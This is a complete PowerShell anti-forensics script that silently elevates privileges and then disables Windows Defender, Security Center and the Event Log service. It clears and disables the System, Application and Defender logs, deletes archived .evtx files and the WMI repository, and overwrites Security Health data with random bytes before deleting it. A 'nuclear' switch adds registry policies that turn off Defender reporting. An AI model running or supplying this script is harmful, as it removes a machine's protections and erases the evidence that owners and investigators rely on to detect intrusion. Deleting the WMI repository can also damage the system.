
# ------------------------------------------------------------
# 0. SHADOW BOOTSTRAP
# ------------------------------------------------------------
param([switch]$ForceAdmin, [switch]$ShadowMode, [switch]$Nuclear)

if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    if ($ForceAdmin -and $PSCommandPath) {
        Write-Host "[SHADOW] Elevating to SYSTEM level..." -ForegroundColor DarkRed
        Start-Process PowerShell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`" -ForceAdmin -ShadowMode -Nuclear" -Verb RunAs -WindowStyle Hidden
        exit
    }
}

if ($ShadowMode) { $ErrorActionPreference = 'SilentlyContinue' }

# ------------------------------------------------------------
# 1. KILL SECURITY HEALTH SERVICE & DEPENDENCIES
# ------------------------------------------------------------
Write-Host "[1] Terminating Security Health ecosystem..." -ForegroundColor Cyan

$securityServices = @(
    "SecurityHealthService",
    "wscsvc",           # Security Center
    "WerSvc",           # Windows Error Reporting
    "EventLog",         # Event Log Service
    "WinDefend",
    "Sense",
    "WdNisSvc"
)

foreach ($service in $securityServices) {
    Get-Service -Name $service -ErrorAction SilentlyContinue | Stop-Service -Force -NoWait
    Set-Service -Name $service -StartupType Disabled -ErrorAction SilentlyContinue
    # Prevent immediate restart
    sc.exe config $service start= disabled 2>$null
}

# ------------------------------------------------------------
# 2. DESTROY EVENT LOGS + BACKUPS (COMPLETE)
# ------------------------------------------------------------
Write-Host "[2] Annihilating Event Log artifacts..." -ForegroundColor Cyan

$defenderLogs = @(
    "Microsoft-Windows-Windows Defender/Operational",
    "Microsoft-Windows-Windows Defender/WHC",
    "Microsoft-Windows-Windows Defender/ThreatTrack",
    "Windows Defender",
    "System",           # Often contains defender events
    "Application"       # May contain security events
)

foreach ($log in $defenderLogs) {
    # Clear current log
    wevtutil.exe clear-log $log /r:$false 2>$null
    
    # Delete backup .evtx files
    $logName = $log.Split('/')[0]
    $evtxBackups = Get-ChildItem -Path "$env:SystemRoot\System32\winevt\Logs\Archive\*$logName*.evtx" -ErrorAction SilentlyContinue
    $evtxBackups += Get-ChildItem -Path "$env:SystemRoot\System32\winevt\Logs\*$logName*.evtx" -ErrorAction SilentlyContinue
    
    foreach ($backup in $evtxBackups) {
        if ($backup.FullName) {
            takeown.exe /f $backup.FullName /a 2>$null
            icacls.exe $backup.FullName /grant administrators:F /T /C /Q 2>$null
            Remove-Item -Path $backup.FullName -Force -ErrorAction SilentlyContinue
            Write-Host "    [EVTX PURGE] $($backup.FullName)" -ForegroundColor DarkGray
        }
    }
    
    # Disable logging for this channel
    wevtutil.exe sl $log /e:false /rt:false /ms:0 2>$null
}

# ------------------------------------------------------------
# 3. NUKE WMI PERMANENT STORAGE (ROOT\SECURITYCENTER2)
# ------------------------------------------------------------
Write-Host "[3] Purging WMI permanent threat database..." -ForegroundColor Cyan

# Delete all AntiVirusProduct instances (where Defender stores history)
Get-WmiObject -Namespace "root\SecurityCenter2" -Class "AntiVirusProduct" -ErrorAction SilentlyContinue | 
    ForEach-Object { 
        Remove-WmiObject -InputObject $_ -ErrorAction SilentlyContinue 
    }

# Clear AntiSpywareProduct
Get-WmiObject -Namespace "root\SecurityCenter2" -Class "AntiSpywareProduct" -ErrorAction SilentlyContinue | 
    Remove-WmiObject -ErrorAction SilentlyContinue

# Clear FirewallProduct
Get-WmiObject -Namespace "root\SecurityCenter2" -Class "FirewallProduct" -ErrorAction SilentlyContinue | 
    Remove-WmiObject -ErrorAction SilentlyContinue

# Destroy CIM Repository backup
$cimRepo = "$env:SystemRoot\System32\wbem\Repository\*"
if (Test-Path $cimRepo) {
    Stop-Service -Name "winmgmt" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path $cimRepo -Recurse -Force -ErrorAction SilentlyContinue
    Start-Service -Name "winmgmt" -ErrorAction SilentlyContinue
}

# ------------------------------------------------------------
# 4. SECURITYHEALTHSERVICE DATABASE DESTRUCTION
# ------------------------------------------------------------
Write-Host "[4] Destroying SecurityHealthService database..." -ForegroundColor Cyan

$securityHealthPaths = @(
    "$env:ProgramData\Microsoft\Windows Security Health\*",
    "$env:LocalAppData\Packages\Microsoft.Windows.SecHealthUI_*\LocalState\*",
    "$env:LocalAppData\Packages\Microsoft.Windows.SecHealthUI_*\LocalCache\*",
    "$env:LocalAppData\Packages\Microsoft.Windows.SecHealthUI_*\TempState\*",
    "$env:SystemRoot\System32\SecurityHealth\*"
)

foreach ($path in $securityHealthPaths) {
    if (Test-Path $path) {
        Get-ChildItem -Path $path -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            if ($_.FullName) {
                try {
                    # Take ownership and destroy
                    takeown.exe /f $_.FullName /a 2>$null
                    icacls.exe $_.FullName /grant administrators:F /T /C /Q 2>$null
                    
                    if ($_.PSIsContainer) {
                        Remove-Item -Path $_.FullName -Recurse -Force -ErrorAction SilentlyContinue
                    } else {
                        # Overwrite file before deletion
                        if ($_.Length -lt 10MB) {
                            $randomBytes = New-Object byte[] $_.Length
                            (New-Object System.Security.Cryptography.RNGCryptoServiceProvider).GetBytes($randomBytes)
                            [System.IO.File]::WriteAllBytes($_.FullName, $randomBytes)
                        }
                        Remove-Item -Path $_.FullName -Force -ErrorAction SilentlyContinue
                    }
                    Write-Host "    [SECHEALTH DELETE] $($_.FullName)" -ForegroundColor DarkGray
                } catch {}
            }
        }
    }
}

# ------------------------------------------------------------
# 5. WINDOWS SECURITY APP CACHE ANNIHILATION
# ------------------------------------------------------------
Write-Host "[5] Obliterating Windows Security App cache..." -ForegroundColor Cyan

# Kill SecurityHealthSystray and App processes
Get-Process -Name "SecurityHealthSystray", "SecurityHealthHost", "SecHealthUI" -ErrorAction SilentlyContinue | 
    Stop-Process -Force -ErrorAction SilentlyContinue

# Clear AppX package data
$appxCachePaths = @(
    "$env:LocalAppData\Microsoft\Windows.Security.Health\*",
    "$env:LocalAppData\Microsoft\Windows\SecurityHealth\Cache\*",
    "$env:LocalAppData\Microsoft\Windows\Caches\*",
    "$env:LocalAppData\Packages\Microsoft.Windows.SecHealthUI_*\AC\*",
    "$env:LocalAppData\Packages\Microsoft.Windows.SecHealthUI_*\Settings\*"
)

foreach ($cachePath in $appxCachePaths) {
    if (Test-Path $cachePath) {
        Remove-Item -Path $cachePath -Recurse -Force -ErrorAction SilentlyContinue
    }
}

# Reset Security & Maintenance cache
$actionCenterPath = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance"
if (Test-Path $actionCenterPath) {
    Remove-ItemProperty -Path $actionCenterPath -Name "*" -ErrorAction SilentlyContinue
}

# ------------------------------------------------------------
# 6. WINDOWS ERROR REPORTING (WER) THREAT DUMPS
# ------------------------------------------------------------
Write-Host "[6] Purging Windows Error Reporting threat dumps..." -ForegroundColor Cyan

$werPaths = @(
    "$env:ProgramData\Microsoft\Windows\WER\*",
    "$env:LocalAppData\Microsoft\Windows\WER\*",
    "$env:SystemRoot\System32\config\systemprofile\AppData\Local\Microsoft\Windows\WER\*"
)

foreach ($werPath in $werPaths) {
    if (Test-Path $werPath) {
        Get-ChildItem -Path $werPath -Recurse -Include "*defender*", "*mpengine*", "*sense*", "*wdnis*" -ErrorAction SilentlyContinue | 
            ForEach-Object {
                if ($_.FullName) {
                    Remove-Item -Path $_.FullName -Recurse -Force -ErrorAction SilentlyContinue
                    Write-Host "    [WER PURGE] $($_.FullName)" -ForegroundColor DarkGray
                }
            }
    }
}

# Clear WER registry
$werReg = "HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting"
if (Test-Path $werReg) {
    Remove-ItemProperty -Path "$werReg\ProcessedReports" -Name "*" -ErrorAction SilentlyContinue
    Remove-ItemProperty -Path "$werReg\QueuedReports" -Name "*" -ErrorAction SilentlyContinue
}

# ------------------------------------------------------------
# 7. DEFENDER TELEMETRY & DIAGNOSTICS DESTRUCTION
# ------------------------------------------------------------
Write-Host "[7] Destroying Defender telemetry pipeline..." -ForegroundColor Cyan

# Stop and disable Diagnostics Tracking Service
Stop-Service -Name "DiagTrack" -Force -ErrorAction SilentlyContinue
Set-Service -Name "DiagTrack" -StartupType Disabled -ErrorAction SilentlyContinue

# Clear Device Census data
$censusPaths = @(
    "$env:ProgramData\Microsoft\Diagnosis\*",
    "$env:ProgramData\Microsoft\Windows\DeviceMetadataCache\*",
    "$env:ProgramData\Microsoft\Windows\Wdi\*"
)

foreach ($censusPath in $censusPaths) {
    if (Test-Path $censusPath) {
        Remove-Item -Path $censusPath -Recurse -Force -ErrorAction SilentlyContinue
    }
}

# Disable Connected User Experiences and Telemetry
$telemetryKey = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection"
if (-not (Test-Path $telemetryKey)) { New-Item -Path $telemetryKey -Force | Out-Null }
Set-ItemProperty -Path $telemetryKey -Name "AllowTelemetry" -Value 0 -Type DWord -Force

# ------------------------------------------------------------
# 8. NUCLEAR OPTION: DISABLE THREAT HISTORY COMPLETELY
# ------------------------------------------------------------
if ($Nuclear) {
    Write-Host "[8] Activating NUCLEAR OPTION: Permanent threat history disable..." -ForegroundColor Red
    
    # Disable all Defender logging via registry
    $defenderLogging = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting"
    if (-not (Test-Path $defenderLogging)) { New-Item -Path $defenderLogging -Force | Out-Null }
    
    Set-ItemProperty -Path $defenderLogging -Name "DisableGenericReports" -Value 1 -Type DWord -Force
    Set-ItemProperty -Path $defenderLogging -Name "DisableEnhancedNotifications" -Value 1 -Type DWord -Force
    Set-ItemProperty -Path $defenderLogging -Name "DisableEventLogging" -Value 1 -Type DWord -Force
    
    # Disable WMI reporting
    $wmiReporting = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard"
    if (-not (Test-Path $wmiReporting)) { New-Item -Path $wmiReporting -Force | Out-Null }
    Set-ItemProperty -Path $wmiReporting -Name "DisableAntiSpyware" -Value 1 -Type DWord -Force
    
    # Block Security Health Service
    $blockSHS = "HKLM:\SYSTEM\CurrentControlSet\Services\SecurityHealthService"
    if (Test-Path $blockSHS) {
        Set-ItemProperty -Path $blockSHS -Name "Start" -Value 4 -Type DWord -Force  # Disabled
    }
}

# ------------------------------------------------------------
# 9. RESTART SERVICES WITH CLEAN STATE
# ------------------------------------------------------------
Write-Host "[9] Restarting services with clean state..." -ForegroundColor Cyan

# Re-enable services but with clean configuration
$securityServices | ForEach-Object {
    if (Get-Service -Name $_ -ErrorAction SilentlyContinue) {
        Set-Service -Name $_ -StartupType Automatic -ErrorAction SilentlyContinue
        Start-Service -Name $_ -ErrorAction SilentlyContinue
    }
}

# Force SecurityHealthService to rebuild database
$secHealth = Get-Service -Name "SecurityHealthService" -ErrorAction SilentlyContinue
if ($secHealth) {
    Stop-Service -Name "SecurityHealthService" -Force -ErrorAction SilentlyContinue
    Start-Service -Name "SecurityHealthService" -ErrorAction SilentlyContinue
}

# ------------------------------------------------------------
# 10. FINAL VERIFICATION & CLEANUP
# ------------------------------------------------------------
Write-Host "[10] Verification and final cleanup..." -ForegroundColor Cyan

# Check if threat history still exists
$threatCheck = wevtutil.exe qe "Microsoft-Windows-Windows Defender/Operational" /rd:true /f:text 2>&1
if ($threatCheck -like "*No events*" -or $threatCheck -like "*not found*") {
    Write-Host "    [✓] Event logs: CLEANED" -ForegroundColor Green
} else {
    Write-Host "    [✗] Event logs: STILL CONTAIN DATA" -ForegroundColor Red
}

# Check WMI
$wmiThreats = Get-WmiObject -Namespace "root\SecurityCenter2" -Class "AntiVirusProduct" -ErrorAction SilentlyContinue
if ($wmiThreats) {
    Write-Host "    [✗] WMI: STILL CONTAINS THREAT DATA ($($wmiThreats.Count) entries)" -ForegroundColor Red
} else {
    Write-Host "    [✓] WMI: CLEANED" -ForegroundColor Green
}

# Check SecurityHealth files
$secHealthFiles = Get-ChildItem "$env:ProgramData\Microsoft\Windows Security Health" -Recurse -ErrorAction SilentlyContinue
if ($secHealthFiles) {
    Write-Host "    [✗] SecurityHealth: STILL HAS $($secHealthFiles.Count) FILES" -ForegroundColor Red
} else {
    Write-Host "    [✓] SecurityHealth: CLEANED" -ForegroundColor Green
}

exit 0
